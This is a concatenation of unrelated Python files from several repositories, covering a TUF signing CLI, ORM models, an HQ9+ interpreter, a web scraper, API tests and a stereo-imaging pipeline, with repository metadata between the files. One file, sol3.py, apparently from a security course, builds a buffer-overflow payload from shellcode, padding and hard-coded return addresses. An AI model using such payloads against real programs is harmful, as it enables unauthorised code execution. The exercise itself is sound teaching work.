    message = 'Invalid keytype encountered: '+delegated_keyid+'\n'
    raise tuf.RepositoryError(message)
  delegations['keys'] = keys

  # Update the 'roles' field.
  roles = delegations.get('roles', {})
  threshold = 1
  delegated_role = parent_role+'/'+delegated_role
  relative_paths = []
  # Strip the leading path component (the 'targets' directory) so paths
  # are relative to it.
  for path in delegated_paths:
    relative_paths.append(os.path.sep.join(path.split(os.path.sep)[1:]))
  roles[delegated_role] = tuf.formats.make_role_metadata([delegated_keyid],
                                                         threshold,
                                                         relative_paths)
  delegations['roles'] = roles

  # Update the larger metadata structure.
  parent_metadata['delegations'] = delegations

  # Try to write the modified 'targets.txt' file.
  parent_signable = tuf.formats.make_signable(parent_metadata)
  _sign_and_write_metadata(parent_signable, parent_keyids, parent_filename)
def process_option(options):
  """
  <Purpose>
    Dispatch to the function implementing the command-line option chosen
    by the user.  E.g. invoking 'signercli' with --genrsakey calls
    'generate_rsa_key()'.

  <Arguments>
    options:
      An optparse OptionValues instance, returned by parser.parse_args().

  <Exceptions>
    tuf.RepositoryError, raised by one of the supported option
    functions.

    tuf.Error, if a valid option was not encountered.

  <Side Effects>
    Files in the repository are either created or modified
    depending on the command-line option chosen by the user.

  <Returns>
    None.
  """

  # Pair each option's keystore-directory argument with its handler.  The
  # first pair whose argument was actually supplied wins, in the same
  # precedence order as before.
  dispatch = [
      (options.genrsakey, generate_rsa_key),
      (options.listkeys, list_signing_keys),
      (options.changepass, change_password),
      (options.dumpkey, dump_key),
      (options.makeroot, make_root_metadata),
      (options.maketargets, make_targets_metadata),
      (options.makerelease, make_release_metadata),
      (options.maketimestamp, make_timestamp_metadata),
      (options.sign, sign_metadata_file),
      (options.makedelegation, make_delegation),
  ]

  for keystore_argument, handler in dispatch:
    if keystore_argument is not None:
      handler(keystore_argument)
      return

  raise tuf.Error('A valid option was not encountered.\n')
def parse_options():
  """
  <Purpose>
    Parse the command-line options.  'signercli' expects a single
    command-line option and one keystore directory argument.
    Example:  signercli --genrsakey ./keystore

    All supported command-line options expect a single keystore
    directory argument.  If 'signercli' is invoked with an incorrect
    number of command-line options or arguments, a parser error
    is printed and the script exits.

  <Arguments>
    None.

  <Exceptions>
    None.

  <Side Effects>
    A file is a created or modified depending on the option
    encountered on the command-line.

  <Returns>
    The options object returned by the parser's parse_args() method.
  """

  usage = 'usage: %prog [option] <keystore_directory>'
  option_parser = optparse.OptionParser(usage=usage)

  # Every supported option is a plain string-valued 'store' whose value is
  # the keystore directory, so declare them all from a single table.
  supported_options = [
      ('--genrsakey',
       'Generate an RSA key and save it to the keystore.'),
      ('--listkeys',
       'List the key IDs of the signing keys located in the keystore.'),
      ('--changepass',
       'Change the password for one of the signing keys.'),
      ('--dumpkey',
       'Dump the contents of an encrypted key file.'),
      ('--makeroot',
       'Create the Root metadata file (root.txt).'),
      ('--maketargets',
       'Create the Targets metadata file (targets.txt).'),
      ('--makerelease',
       'Create the Release metadata file (release.txt).'),
      ('--maketimestamp',
       'Create the Timestamp metadata file (timestamp.txt).'),
      ('--sign',
       'Sign a metadata file.'),
      ('--makedelegation',
       "Create a delegated role by creating its metadata file and "
       "updating the parent role's metadata file."),
  ]
  for flag, description in supported_options:
    option_parser.add_option(flag, action='store', type='string',
                             help=description)

  (options, remaining_arguments) = option_parser.parse_args()

  # Exactly one option plus its single keystore argument must be present
  # (program name + option flag + value = 3 argv entries).
  # option_parser.error() prints the message and exits.
  if len(sys.argv) != 3:
    option_parser.error('Expected a single option and one keystore argument.')

  return options
if __name__ == '__main__':
  options = parse_options()

  # Process the command-line option chosen by the user.
  # 'tuf.RepositoryError' raised by the option's corresponding
  # function if an error occurred.  'tuf.Error' raised if a valid
  # option was not provided by the user.
  try:
    process_option(options)
  except (tuf.RepositoryError, tuf.Error), e:
    # Report the failure to stderr and signal it via exit status 1.
    sys.stderr.write('Error: '+str(e))
    sys.exit(1)

  # The command-line option was processed successfully; exit status 0.
  sys.exit(0)
__author__ = 'tombnorwood'
from .parabolicpathinputrecord import *
from .volcurve import *
from .volcurveinput import *
from .skewinput import *
from .volcurveinputrecord import *
UTF-8
Python
false
false
2,014
3,384,434,250,929
d3dfe6dfc09257e3a112223abbc7d63e9d2c57c4
832d2d4e037907418dba66b4b446eab3c5a7fb68
/core/db/company.py
3f11ad6366adbef33e0d26dea61776b786610c96
[]
no_license
cloudfishin/99scraper
https://github.com/cloudfishin/99scraper
e6dade920777cfd8cc86ac46fa9c12d6ab6d9cc5
f2628143219d6be9c6e94389d7cc6a6765cd796e
refs/heads/master
2021-01-24T06:12:49.838253
2014-04-17T00:03:08
2014-04-17T00:04:38
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from sqlalchemy.orm import relationship
__author__ = 'jesuejunior'
from sqlalchemy import Integer, Column, String, Float
import core
class Company(core.db.Model):
    """One scraped company profile row."""

    __tablename__ = 'company'

    # Surrogate primary key.
    id = Column(Integer, primary_key=True)
    # Company name; doubles as a natural key (unique).
    title = Column(String, nullable=False, unique=True)
    # Ranking score (float) from the source listing.
    rank = Column(Float, nullable=False)
    # Counts shown on the listing: open vacancies and followers.
    vacancy = Column(Integer, nullable=False)
    follows = Column(Integer, nullable=False)
    mission = Column(String, nullable=False)
    about = Column(String, nullable=False)
    # Optional: source page path and thumbnail location.
    path = Column(String)
    thumb = Column(String)
    # stats = relationship("Stats", uselist=False, backref="profile")
"""
A simple implementation of the HQ9+ programming language.
http://esolangs.org/wiki/HQ9%2B
Ignores everything except the four valid commands(case insensitive):
H Prints "Hello, world!"
Q Prints the entire text of the source code file.
9 Prints the complete canonical lyrics to "99 Bottles of Beer on the Wall"
+ Increments the accumulator.
"""
import sys
import re
import bottles
class HQ9PlusProgram(object):
    """An executable HQ9+ program: the source text plus the accumulator."""

    def __init__(self, src):
        # Keep the raw source for the Q (quine) command.
        self.src = src
        # The accumulator; '+' increments it, nothing in this class reads it.
        self.acc = 0
        # Dispatch table from command character to handler.
        self.commands = {
            'H': self.hello,
            'Q': self.quine,
            '9': self.nine,
            '+': self.plus,
        }

    def hello(self):
        """H: print the canonical greeting."""
        print 'Hello, world!'

    def quine(self):
        """Q: print the program's own source text."""
        print self.src

    def nine(self):
        """9: print the '99 Bottles of Beer' lyrics."""
        print '\n'.join(bottles.verses())

    def plus(self):
        """+: increment the accumulator."""
        self.acc += 1

    def run(self):
        """Execute every valid command character, case-insensitively.

        upper() lets lowercase 'h'/'q' match; the regex silently drops all
        other characters, as the language requires.
        """
        for letter in re.findall(r'[HQ+9]', self.src.upper(), re.MULTILINE):
            self.commands[letter]()
def main():
    """Read HQ9+ source from argv[1], or stdin when no file is given, and run it."""
    # Choose the input stream up front; the 'with' closes either one.
    source_stream = open(sys.argv[1]) if len(sys.argv) > 1 else sys.stdin
    with source_stream:
        HQ9PlusProgram(source_stream.read()).run()
main()
UTF-8
Python
false
false
2,014
5,291,399,727,627
3f3349b4c9118c83b545d669b4096d23ebea6e70
6e97f24d3dfbc1f65a691bfa098d2e4a583e51ee
/20130911_econometrics1.py
a8a815bbf8471db7fd25fbf8cfc3adfd7c15ec4c
[]
no_license
mchoimis/Python-Practice
https://github.com/mchoimis/Python-Practice
e800a6859de496dfef2a00da5a98e1d0fc512ad4
ec5a48032768a8ce4be7a4c6a269ba1f26e02b3f
refs/heads/master
2021-01-20T00:23:36.940700
2014-06-05T01:27:05
2014-06-05T01:27:05
12,071,659
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
import math
import decimal  # NOTE(review): unused in this script.

# Two-asset portfolio: weight w in asset 1, (1 - w) in asset 2.
w=0.75
# Expected portfolio return -- presumably expected returns of 8% and 5%
# on the two assets (TODO confirm against the exercise statement).
mu=w*0.08+(1-w)*0.05
# Portfolio variance with sigma1=0.07, sigma2=0.04; the cross term
# 2*w*(1-w)*0.07*0.04*0.25 implies a correlation of 0.25.
Var=pow(w, 2)*pow(0.07, 2) + pow((1-w), 2)*pow(0.04, 2) + 2*w*(1-w)*0.07*0.04*0.25
print w
print Var
print mu
# Portfolio standard deviation (volatility).
print math.sqrt(Var)
UTF-8
Python
false
false
2,014
17,970,143,168,909
b1ce74a045e436c60068f417602f07f926ce767a
e4a1e93106ce03f7e820b2097f406212f828df6f
/FlickrPython/models.py
1df4d79a01fc29857fe5504dd021488b00767a7c
[]
no_license
gerahe/FlickrPython
https://github.com/gerahe/FlickrPython
58151b7204c5ba3fea70b97af3cec5a5cf3e8b1f
8bdfc0af7d0aa537155911b78d2674e2a6ec8bf4
refs/heads/master
2016-08-06T13:14:13.741589
2014-10-17T16:08:26
2014-10-17T16:08:26
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# This is an auto-generated Django model module.
# You'll have to do the following manually to clean this up:
# * Rearrange models' order
# * Make sure each model has one field with primary_key=True
# Feel free to rename the models, but don't rename db_table values or field names.
#
# Also note: You'll have to insert the output of 'django-admin.py sqlcustom [appname]'
# into your database.
from django.db import models
class UserTasks(models.Model):
    """Per-user progress state for the two annotation tasks (inspectdb-generated)."""

    username = models.CharField(max_length=30, unique=True)
    # Completion flags and running scores/counts for each task.
    task1_complete = models.BooleanField()
    task2_complete = models.BooleanField()
    task1_score = models.IntegerField()
    task1_count = models.IntegerField()
    average_tags = models.IntegerField()
    task2_score = models.IntegerField()
    # NOTE(review): reads like a scratch value for task 2 -- confirm usage.
    temp2_score = models.IntegerField()
    task2_count = models.IntegerField()
    # IDs of photos already shown to this user, comma-separated.
    photos_used = models.CommaSeparatedIntegerField(max_length=100)

    class Meta:
        # Preserve the legacy table name from the inspected database.
        db_table = u'user_tasks'
class PhotoList(models.Model):
    """A photo with per-task usage counts and its accumulated tags."""

    photo_id = models.IntegerField()
    # How many times the photo has been used in task 1 / task 2.
    num_task1 = models.IntegerField()
    num_task2 = models.IntegerField()
    num_tags = models.IntegerField()
    tags = models.TextField()

    def __str__(self):
        # Debug-friendly dump of every field.
        return "PhotoId: " + str(self.photo_id) + ", num_task1: " + str(self.num_task1) + ", num_task2 " + \
            str(self.num_task2) + ", num_tags: " + str(self.num_tags) + ", tags: " + str(self.tags)

    class Meta:
        # Preserve the legacy table name from the inspected database.
        db_table = u'photo_list'
"""
Satchless
An e-commerce framework for Python
"""
import logging
from . import process
from . import item
from . import cart
__all__ = ['cart', 'item', 'process']
class SatchlessBaseError(Exception):
    """Base Exception class.

    The (optionally %-formatted) message is logged under the concrete
    exception class' name before the exception is initialised.

    :note: This will try to use the logging module
    :param message: the Exception message; may contain %-style placeholders
    :type message: str
    :param data: Used to format the message string
    """

    def __init__(self, message, data=None):
        try:
            message = message % data
        except Exception:
            # Best-effort formatting only: keep the raw message when the
            # placeholders and `data` do not match.  Narrowed from a bare
            # `except:` so SystemExit/KeyboardInterrupt are not swallowed.
            pass

        # Log the message using the concrete (sub)class name as logger name.
        logging.getLogger( self.__class__.__name__ ).exception( message )
        Exception.__init__(self, message)
class SatchlessBaseClass(object):
    """Base class used throughout satchless."""

    ArgsError = SatchlessBaseError
    KwargsError = SatchlessBaseError
    ParamError = SatchlessBaseError

    # Lazily-created logger, named after the concrete subclass.
    LOG = None

    def logit(self, message, level=logging.DEBUG):
        """Write `message` to logging.

        :param message: String to send
        :param level: Desired log level: either a numeric logging level
            (Default: logging.DEBUG) or a logger method name such as 'debug'
        :raises: satchless.SBase.ParamError
        """
        if not self.LOG:
            # use subclass name, not SBase
            # (fixed: was a bare `getLogger`, a NameError)
            self.LOG = logging.getLogger( self.__class__.__name__ )

        if isinstance(level, int):
            # Numeric levels (logging.DEBUG, logging.INFO, ...) must go
            # through Logger.log(); getattr() needs a string name and so
            # could never work with the documented default.
            self.LOG.log(level, message)
            return

        try:
            getattr( self.LOG, level )(message)
        except AttributeError:
            # Fixed: `ParamError` was unqualified (NameError); raise the
            # class-level alias instead.
            raise self.ParamError("could not find level (%s) in self.LOG" % level)
UTF-8
Python
false
false
2,014
5,085,241,307,243
17c0683ae47e4b322c968bcb59e18239ab66b994
cbbb728c0cf2256693dd99444638e207701fb8c5
/institutions/respondants/views.py
3b8628feb18eb2d932274099441fc272c6861795
[
"CC0-1.0"
]
permissive
virtix/mapusaurus
https://github.com/virtix/mapusaurus
4f306485d581f01638f12994383976ede625a4d3
93047a837faf43b2c6ec16111900a11ccce0b51a
refs/heads/master
2021-01-15T22:09:52.251027
2014-05-29T11:12:27
2014-05-29T11:12:27
20,239,367
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponseRedirect
from respondants.forms import InstitutionSearchForm
from respondants.models import Institution
def respondant(request, respondant_id):
    """Render the detail page for one institution, including its parent chain."""
    institution = get_object_or_404(Institution, pk=respondant_id)
    context = {'respondant': institution}

    # Walk up the ownership chain, starting with the institution itself.
    chain = [institution]
    ancestor = institution.parent
    while ancestor:
        chain.append(ancestor)
        ancestor = ancestor.parent

    # The top-most reporting institution may reference a non-reporting parent.
    if chain[-1].non_reporting_parent:
        context['non_reporting_parent'] = chain[-1].non_reporting_parent

    # Parents only (the institution itself excluded), top-most first.
    context['parents'] = reversed(chain[1:])
    return render(
        request,
        'respondants/respondant.html',
        context
    )
def index(request):
    """ The main view. Display the institution search box here. """
    # Bind the form on POST; otherwise show it empty.
    form = (InstitutionSearchForm(request.POST)
            if request.method == 'POST' else InstitutionSearchForm())

    if form.is_bound and form.is_valid():
        # Hand the query off to the search view.
        return HttpResponseRedirect(
            '/institutions/search/?q=%s' % form.cleaned_data['name_contains'])

    # GET, or an invalid submission (re-rendered with its errors).
    return render(
        request,
        'respondants/index.html',
        {'search_form': form}
    )
def search(request):
    """Render institutions whose name contains the (upper-cased) query."""
    query = request.GET.get('q', '')
    results = {}
    if query:
        # The query is upper-cased before matching -- names are presumably
        # stored upper-case (TODO confirm against the data load).
        matches = Institution.objects.filter(name__contains=query.upper())
        if matches:
            results['respondants'] = matches
    return render(
        request,
        'respondants/search_results.html',
        {'results': results}
    )
UTF-8
Python
false
false
2,014
10,771,777,988,466
0f8faf02d2c7d23c2319208ba994d2b20df59479
295d5d38e364a87f0c06353a7e183bad73ae9767
/src/asp/Tools/lronac4staged.py.in
d9d5a382668acb02da1cbeb5ccb7742d829e358c
[
"Apache-2.0"
]
permissive
figo829/StereoPipeline
https://github.com/figo829/StereoPipeline
871b04abb23abd87a94354482d406ecb0dd9879c
a062181bc70a93f2dd6d2bccef649938de39d200
refs/heads/master
2021-01-17T23:09:40.936110
2013-03-28T20:35:48
2013-03-28T20:45:21
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python
# __BEGIN_LICENSE__
# Copyright (c) 2009-2012, United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration. All
# rights reserved.
#
# The NGT platform is licensed under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# __END_LICENSE__
import os, glob, optparse, re, shutil, subprocess, sys, string
job_pool = [];
def man(option, opt, value, parser):
    """optparse callback for --manual: print the usage and manual, then exit."""
    print >>sys.stderr, parser.usage
    print >>sys.stderr, '''\
This program creates directories and runs cam2map for the 4 stereo
combinations needed to create an entire LRO-NAC frame.
It can also run the following steps:
 * Stereo for each session
 * Point2dem for each session
'''
    sys.exit()
class Usage(Exception):
    """Raised to surface a command-line usage error; `msg` is printed by main()."""
    def __init__(self, msg):
        self.msg = msg
def add_job( cmd, num_working_threads=4, cwd=None ):
    """Launch `cmd` through the shell, keeping at most `num_working_threads`
    jobs in flight; blocks on the oldest job first when the pool is full."""
    if ( len(job_pool) >= num_working_threads):
        # Throttle: wait for the oldest job before starting another.
        job_pool[0].wait();
        job_pool.pop(0);
    print cmd;
    job_pool.append( subprocess.Popen(cmd, shell=True, cwd=cwd) );
def wait_on_all_jobs():
    """Block until every queued subprocess in job_pool has finished."""
    print "Waiting for jobs to finish";
    while len(job_pool) > 0:
        # Wait for and retire jobs oldest-first.
        job_pool[0].wait();
        job_pool.pop(0);
class JobDescription:
    """One stereo session: its name plus the left/right input cube files."""

    def __init__(self, name, left, right):
        self.name = name
        self.left = left
        self.right = right
        # Cache the filename prefixes used to locate the *.map.cub outputs.
        self.left_prefix, self.right_prefix = prefix(left), prefix(right)
def prefix( filename ):
    """Return `filename` up to (but not including) its first '.'.

    A name without any dot is returned unchanged; the previous
    find()-based slice returned -1 for such names and silently
    dropped the last character.
    """
    return filename.partition('.')[0]
def build_session_directory(job_desc, options):
    """Create (or, with --force, recreate) one stereo session directory.

    Makes the directory, symlinks the two input cubes and stereo.default
    into it, then queues cam2map4stereo.py to produce the *.map.cub files.
    """
    # Create Directory (wiped first when --force was given).
    if os.path.isdir(job_desc.name) and options.force:
        os.system("rm -rf %s" % job_desc.name)
    if not os.path.isdir(job_desc.name):
        os.system("mkdir %s" % job_desc.name)
    # Create Symlinks to the inputs and the shared stereo.default.
    # NOTE(review): these Popen calls are never waited on, so the 'rm' and
    # the 'ln -s' for the same target may race -- confirm this is intended.
    symlinks = [job_desc.left, job_desc.right, "stereo.default"]
    for target in symlinks:
        if os.path.exists(os.path.join(job_desc.name, target)) and options.force:
            subprocess.Popen("rm %s" % target, shell=True, cwd=job_desc.name)
        if not os.path.exists(os.path.join(job_desc.name, target)):
            subprocess.Popen("ln -s ../%s" % target, shell=True, cwd=job_desc.name)
    # Run cam2map only when either mapped cube is missing (or forced away).
    if os.path.exists(os.path.join(job_desc.name, job_desc.left_prefix + ".map.cub")) and options.force:
        subprocess.Popen("rm %s" % (job_desc.left_prefix + ".map.cub"), shell=True, cwd=job_desc.name)
    if os.path.exists(os.path.join(job_desc.name, job_desc.right_prefix + ".map.cub")) and options.force:
        subprocess.Popen("rm %s" % (job_desc.right_prefix + ".map.cub"), shell=True, cwd=job_desc.name)
    if not os.path.exists(os.path.join(job_desc.name, job_desc.left_prefix + ".map.cub")) or not os.path.exists(os.path.join(job_desc.name, job_desc.right_prefix + ".map.cub")):
        cmd = "cam2map4stereo.py %s %s" % (job_desc.left, job_desc.right)
        add_job(cmd, options.threads, job_desc.name)
def stereo( job_desc, threads, additional ):
    """Queue one 'stereo' run for the session, inside its own directory."""
    command = "stereo %s.map.cub %s.map.cub stereo/%s %s" % (
        job_desc.left_prefix, job_desc.right_prefix, job_desc.name, additional)
    add_job(command, threads, job_desc.name)
def point2dem( job_desc, threads, additional ):
    """Queue one 'point2dem' run over the session's point cloud."""
    command = "point2dem -r moon %s/stereo/%s-PC.tif %s" % (
        job_desc.name, job_desc.name, additional)
    add_job(command, threads)
#---------------------------
def main():
    """Parse options, build the four LE/RE session directories, then
    optionally run stereo and point2dem over each session.

    Returns 0 on success, 2 on a usage error.
    """
    try:
        try:
            usage = "usage: lronac4staged.py [--help][--manual][--threads N] LRONAC_CAL.CUB-files\n [ASP [@]ASP_VERSION[@]]"
            parser = optparse.OptionParser(usage=usage)
            parser.set_defaults(delete=True)
            parser.set_defaults(threads=4)
            parser.add_option("--manual", action="callback", callback=man,
                              help="Read the manual.")
            parser.add_option("-t", "--threads", dest="threads",
                              help="Number of threads to use.", type="int")
            parser.add_option("--force", dest="force", action="store_true",
                              help="Force overwriting of previous process's directories.")
            parser.add_option("--stereo", dest="stereo", action="store_true",
                              help="Perform stereo on each session.")
            parser.add_option("--point2dem", dest="point2dem", action="store_true",
                              help="Perform point2dem on each session.")
            parser.add_option("--args", dest="args",
                              help="Additional arguments to apply to your command", type="string")
            (options, args) = parser.parse_args()

            if not len(args) == 4: parser.error("need 4 *.CUB files")
        except optparse.OptionError, msg:
            raise Usage(msg)

        # Sort so the four cubes pair into the LE/RE combinations below
        # (presumably LE* sorts before RE* -- confirm against input naming).
        args.sort()
        jobs = []
        jobs.append( JobDescription("LELE", args[0], args[2]) )
        jobs.append( JobDescription("RERE", args[1], args[3]) )
        jobs.append( JobDescription("LERE", args[0], args[3]) )
        jobs.append( JobDescription("RELE", args[1], args[2]) )

        # Build all session directories (and their cam2map jobs) first.
        for job in jobs:
            build_session_directory( job, options )
        wait_on_all_jobs()

        if options.stereo:
            for job in jobs:
                stereo( job, options.threads, options.args )
            wait_on_all_jobs()
        if options.point2dem:
            for job in jobs:
                point2dem( job, options.threads, options.args )
            wait_on_all_jobs()

        print "Finished"
        return 0

    except Usage, err:
        print >>sys.stderr, err.msg
        # print >>sys.stderr, "for help use --help"
        return 2

    # To more easily debug this program, comment out this catch block.
    # except Exception, err:
    #     sys.stderr.write( str(err) + '\n' )
    #     return 1
if __name__ == "__main__":
    # Propagate main()'s status (0 ok, 2 usage error) to the shell.
    sys.exit(main())
#encoding=utf8
from __future__ import unicode_literals
import requests
from bs4 import BeautifulSoup
import json
import webbrowser
def safeSelectText(s, path):
    """Return the text of the first element matching CSS selector `path`, or ''.

    Runs the selector only once; the original evaluated it twice (once for
    the emptiness check and again for the result).
    """
    matches = s.select(path)
    return matches[0].text if matches else ""
def query(key):
    """Scrape the v2ex 'all' tab and return launcher result items as JSON.

    `key` (the user's query string) is currently ignored: every topic on
    the front page is returned.
    """
    r = requests.get('http://v2ex.com/?tab=all')
    bs = BeautifulSoup(r.text)
    results = []
    for i in bs.select(".box div.item"):
        res = {}
        title = safeSelectText(i,".item_title")
        subTitle = safeSelectText(i,".fade")
        # Topic links are site-relative; make them absolute.
        url = "http://v2ex.com" + i.select(".item_title a")[0]["href"]
        res["Title"] = title
        res["SubTitle"] = subTitle
        # "openUrl" names the action callback below; ActionPara is its argument.
        res["ActionName"] = "openUrl"
        res["IcoPath"] = "Images\\app.ico"
        res["ActionPara"] = url
        results.append(res)
    return json.dumps(results)
def openUrl(url):
    """Action callback: open `url` in the default web browser."""
    webbrowser.open(url)
if __name__ == "__main__":
    # Manual smoke test; note the query argument is ignored by query().
    print query("movie geo")
UTF-8
Python
false
false
2,014
3,332,894,648,679
8cad73fdb8ebcd578ee6131e27f6ff3beb1e199e
237472502fb403aef44a690f90e586864e1eb672
/proj4/sol3.py
4d75356fbcce0fa9708adf8117deeb32e72061be
[
"CC0-1.0"
]
permissive
jiaxiluo/Security
https://github.com/jiaxiluo/Security
50369580cc8d7add3f2f50009d59f7acab08f224
af8f20728e872cf2fa825ee7aea6eda5fdd28fa7
refs/heads/master
2016-09-06T11:42:59.779106
2014-12-04T18:57:09
2014-12-04T18:57:09
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from struct import pack
from shellcode import shellcode

# Buffer-overflow payload: 23-byte shellcode, 'a'-padding out to 2048 bytes,
# then two little-endian 32-bit stack addresses -- presumably a saved
# frame-pointer / return-address overwrite; confirm against the target
# binary's stack layout.
print shellcode + "a" * (2048 - 23) + pack("<I", 0xbffe90c8) + pack("<I", 0xbffe98dc)
UTF-8
Python
false
false
2,014
14,370,960,603,720
6a9bbd494a8118170c2e408acf716b771b132bcb
7f44f150c820e1b5e2539b4ac26c23a1a00556de
/string_to_list_test.py
2c4ee314d51c0b1edc088c17c2123a9d060b6bd3
[]
no_license
kuuot/web-python
https://github.com/kuuot/web-python
4500f75e0ab35295aa36a21e18fdf8bf8e322732
d974e133c1a268336d9f11579ba1177eaf8e529f
refs/heads/master
2015-08-18T05:13:06.915003
2014-12-22T08:42:49
2014-12-22T08:42:49
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# Terrence Kuo
# Citation: https://www.udacity.com/course/cs101
# About: Testing out functionality of the StringToList() class

import string_to_list

if __name__ == "__main__":
	# create object
	manipulate = string_to_list.StringToList();

	# add words to list, splitting on the separator set " ./\n-,"
	manipulate.add_words("After, there/as he-was. he and it. was, asdf \n hi", " ./\n-,");
	print manipulate;

	# The calls below are a manual checklist of the remaining StringToList
	# operations; uncomment one at a time to exercise it.

	# add more words to list
	#manipulate.add_words("You=now thats it's a/ good day. when something!!! happens....", " =!./\n-,");
	#print manipulate;

	# add words to list from html content
	#manipulate.detag("<!DOCTYPE html> <body> Hi there my name is well you know what it is it is </body> regular person");
	#print manipulate

	# removes character:
	#manipulate.remove_char("i");
	#print manipulate;

	# removes multiple character:
	#manipulate.remove_char("it");
	#print manipulate;

	# removes word
	#manipulate.remove_words("After");
	#print manipulate;

	# removes multiple word
	#manipulate.remove_words("After there he");
	#print manipulate;

	# removes word with specified character
	#manipulate.remove_words_with_char("h");
	#print manipulate;

	# replaces word
	#manipulate.replace_word("After", "abc");
	#print manipulate;

	# remove repeated words
	#manipulate.remove_repeats();
	#print manipulate;
UTF-8
Python
false
false
2,014
2,156,073,599,821
525af838df69a2a92861bb1faaf2867222a225ec
d88e79d82ef37bc060c915baa29136c3e8acd61f
/test/test_api.py
c571b98c1abbf6f7d099a68c13c44f5bdea2981d
[]
no_license
koolhead17/hypernotes
https://github.com/koolhead17/hypernotes
7f6085c8ad6be321cbc3dd1a1f97853b26da4fa8
43073d2cc3503b5f0c6ef50411b66aa362e53459
refs/heads/master
2016-10-12T01:47:11.044708
2011-08-09T11:48:55
2011-08-09T11:48:55
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import json
from hypernotes import web
from hypernotes import logic
TESTDB = 'hypernotes-test'
class TestApi(object):
    """Integration tests for the JSON API.

    Runs against a throwaway index named TESTDB; requires an Elasticsearch
    server on 127.0.0.1:9200.
    """

    @classmethod
    def setup_class(cls):
        # Point the app at the test index and create the fixtures once.
        web.app.config['ELASTIC_SEARCH_HOST'] = '127.0.0.1:9200'
        web.app.config['ELASTIC_DB'] = TESTDB
        logic.init_db()
        cls.app = web.app.test_client()
        cls.make_fixtures()

    @classmethod
    def teardown_class(cls):
        # Drop the entire test index so runs do not leak state.
        conn, db = logic.get_conn()
        conn.delete_index(TESTDB)

    @classmethod
    def make_fixtures(self):
        # NOTE(review): declared @classmethod, so 'self' here is actually
        # the class object; attributes set below are class attributes.
        self.username = u'tester'
        inuser = {
            'id': self.username,
            'fullname': 'The Tester'
        }
        indata = {
            'title': 'My New Note',
            'body': '## Xyz',
            'tags': ['abc', 'efg'],
            'owner': self.username
        }
        # Create the user, one note, and one thread holding that note.
        self.app.post('/api/v1/user', data=json.dumps(inuser))
        out = self.app.post('/api/v1/note', data=json.dumps(indata))
        self.note_id = json.loads(out.data)['id']
        self.thread_name = 'default'
        inthread = {
            'name': self.thread_name,
            'title': 'My Test Thread',
            'description': 'None at the moment',
            'notes': [ self.note_id ],
            'owner': self.username
        }
        out = self.app.post('/api/v1/thread', data=json.dumps(inthread))
        self.thread_id = json.loads(out.data)['id']

    def test_user(self):
        # User fixture is retrievable by id.
        res = self.app.get('/api/v1/user/%s' % self.username)
        data = json.loads(res.data)
        assert data['fullname'] == 'The Tester', data

    def test_note(self):
        # Note fixture is retrievable by its generated id.
        res = self.app.get('/api/v1/note/%s' % self.note_id)
        assert res.status_code == 200, res.status
        data = json.loads(res.data)
        assert data['body'] == '## Xyz', data

    def test_note_search_no_query(self):
        # An empty query still returns the single fixture note.
        res = self.app.get('/api/v1/note?q=')
        assert res.status_code == 200, res.status
        data = json.loads(res.data)
        count = data['result']['hits']['total']
        assert count == 1, count

    def test_note_search_2_basic_text(self):
        # Full-text match against the fixture title 'My New Note'.
        res = self.app.get('/api/v1/note?q=new')
        assert res.status_code == 200, res.status
        data = json.loads(res.data)
        count = data['result']['hits']['total']
        assert count == 1, count

    def test_note_search_3_should_not_match(self):
        res = self.app.get('/api/v1/note?q=nothing-that-should-match')
        assert res.status_code == 200, res.status
        data = json.loads(res.data)
        count = data['result']['hits']['total']
        assert count == 0, count

    def test_thread(self):
        # Threads are addressable both by id and by owner/name (redirect).
        res = self.app.get('/api/v1/thread/%s' % self.thread_id)
        assert res.status_code == 200, res.status
        data = json.loads(res.data)
        assert data['title'] == 'My Test Thread', data
        res = self.app.get('/api/v1/%s/thread/%s' % (self.username,
            self.thread_name), follow_redirects=True)
        assert res.status_code == 200, res.status
        data = json.loads(res.data)
        assert data['title'] == 'My Test Thread', data

    def test_thread_update(self):
        # PUT with the same id overwrites the thread's fields.
        id_ = 'testupdate'
        indata = {
            'id': id_,
            'title': 'Abc'
        }
        res = self.app.post('/api/v1/thread', data=json.dumps(indata))
        indata2 = {
            'id': id_,
            'title': 'Xyz'
        }
        res = self.app.put('/api/v1/thread/%s' % id_, data=json.dumps(indata2))
        out = logic.Thread.get(id_)
        assert out['title'] == 'Xyz', out
UTF-8
Python
false
false
2,011
10,033,043,627,914
6fb8583375ab7029d3863fe4757cd2bb0d90ee1f
8ab66dcf8e91734d730f7799839ceddfa289b4cd
/barnacle-1.0.0/src/parsers/genes/ensembl.py
619010af380aafc6d9b30e3e22d36a809e4f94b6
[]
no_license
ptraverse/gsc
https://github.com/ptraverse/gsc
7bbbe67652575b5e7d3ca68e85a213fd7536125d
21e6b699f91cf9604f973d51745c3975cbd8e22c
refs/heads/master
2021-01-23T17:58:50.910026
2013-01-03T09:06:05
2013-01-03T09:06:05
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
"""
ensembl.py
Created by Readman Chiu
Edited by Lucas Swanson
Copyright (c) 2012 Canada's Michael Smith Genome Sciences Centre. All rights reserved.
"""
import transcript
from optparse import OptionParser
import os, re
#for ensGene.txt from UCSC
fields_a = {1:"name", 2:"chrom", 3:"strand", 4:"txStart", 5:"txEnd",
6:"cdsStart", 7:"cdsEnd", 8:"exonCount", 9:"exonStarts", 10:"exonEnds",
12:"alias"}
#for ensGene_ref.txt created in-house
fields_b = {0:"name", 2:"chrom", 3:"strand", 4:"txStart", 5:"txEnd",
6:"cdsStart", 7:"cdsEnd", 8:"exonCount", 9:"exonStarts", 10:"exonEnds",
16:"alias"}
